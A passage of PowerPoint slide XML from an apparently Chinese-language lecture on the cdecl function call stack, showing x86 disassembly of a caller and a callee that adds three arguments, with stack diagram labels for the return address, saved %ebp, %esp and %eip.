                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    0xc(%ebp),%eax</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9:   01 c2       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add    %eax,%edx</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b:   8b 45 10    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    0x10(%ebp),%eax</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e:   01 d0       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>add    %edx,%eax</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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Shape 373"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13: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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="374" name="Shape 374"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Shape 375"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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int ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376" name="Shape 376"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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377" name="Shape 377"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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378" name="Shape 378"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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379" name="Shape 379"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="380" name="Shape 380"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798409" y="5910533"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1633503"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="381" name="Shape 381"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1633503"/>
              <a:ext cx="11262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%esp, %ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="382" name="Shape 382"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="17637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383" name="Shape 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028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3</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Shape 384"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437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2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Shape 385"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847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1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Shape 386"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="52569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return address (callee)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387" name="Shape 387"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="56665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%ebp in caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="388" name="Shape 388"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="385" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5089200" y="5052133"/>
            <a:ext cx="2857200" cy="253600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="389" name="Shape 389"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="384" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5098800" y="4642533"/>
            <a:ext cx="2847600" cy="860800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="390" name="Shape 390"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="383" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="5146000" y="4232933"/>
            <a:ext cx="2800400" cy="1665600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="391" name="Shape 391"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5719700" y="5581133"/>
            <a:ext cx="1768400" cy="365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333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%eax = 1 + 2 + 3</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="392" name="Shape 392"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-144115" y="6123185"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="393" name="Shape 393"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="394" name="Shape 394"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1639E95B-D823-4D1E-A908-2535B7EDDD2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="矩形 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94D83108-997F-46B2-A663-AE00D822B566}"/>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400" name="Shape 400"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333"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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="401" name="Shape 401"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13: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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="402" name="Shape 402"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="403" name="Shape 403"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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int ret</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="404" name="Shape 404"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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405" name="Shape 405"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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406" name="Shape 406"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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407" name="Shape 407"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="408" name="Shape 408"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="5479908"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="409" name="Shape 409"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="11262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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="410" name="Shape 410"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>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411" name="Shape 411"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028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3</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Shape 412"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437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2</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Shape 413"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847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1</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="Shape 414"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="52569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return address (callee)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Shape 415"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="56665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buSzPts val="1100"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="416" name="Shape 416"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="417" name="Shape 417"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="418" name="Shape 418"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="419" name="Shape 419"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="6328548"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="420" name="Shape 420"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="421" name="Shape 421"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{565AF0BD-E077-45F1-9FD5-22BB2F0B9EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97CE35D2-4496-4090-A2A7-395E6301BD02}"/>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7" name="Shape 427"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
